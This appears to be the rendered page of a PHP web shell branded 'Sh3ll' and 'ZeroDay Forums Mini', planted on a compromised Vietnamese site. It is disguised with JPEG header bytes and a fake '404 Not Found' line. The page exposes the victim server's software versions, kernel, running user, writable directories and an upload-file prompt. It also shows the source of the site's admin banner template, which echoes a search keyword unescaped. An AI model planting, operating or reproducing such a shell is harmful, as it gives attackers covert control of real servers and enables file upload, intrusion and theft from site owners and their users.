ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/admin/banner/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/admin/banner/list_tpl.php
<div class="card">
    <div class="card-header">
        Danh sách banner slider
        <div class="card-tools">
            <div class="d-flex">
                <div class="mr-auto">
                    <div class="form-group">
                        <a href="?act=admin&code=banner&type=post" class="btn btn-primary btn-sm"><i class="fa fa-plus"></i> Thêm mới
                        </a>
                        <a href="javascript:void(0);" class="btn btn-primary btn-sm" id="update_pos"><i class="fa fa-bars"></i> Cập nhật vị trí
                        </a>
                    </div>
                </div>
                <div class="ml-2">
                    <div class="form-group">
                        <input id="demo-input-search2" type="text" placeholder="Nhập từ khóa và bấm Enter" autocomplete="off" class="module_title_search" value="<?php echo $keyword;?>">
                        <input type="hidden" value="act=admin&code=banner&type=list" id="txt_code_search">
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="card-body">
        <form action="" method="post" id="form_quick_update">
            <input type="hidden" name="type2" value="">
            <table class="table table-bordered color-table info-table">
                <thead>
                <tr>
                    <th>Vị trí</th>
                    <th>Tên banner</th>
                    <th>Ảnh banner</th>
                    <th>Size</th>
                    <th>URL</th>
                    <th>Ngày gởi</th>
                    <th>#</th>
                </tr>
                </thead>
                <tbody>
                <?php echo $txt_list_banner;?>
                </tbody>
            </table>
        </form>
        <div class="text-right footable">
            <ul class="pagination" style="float: right;">
                <?php echo $nav;?>
            </ul>
        </div>
    </div>
</div>

ZeroDay Forums Mini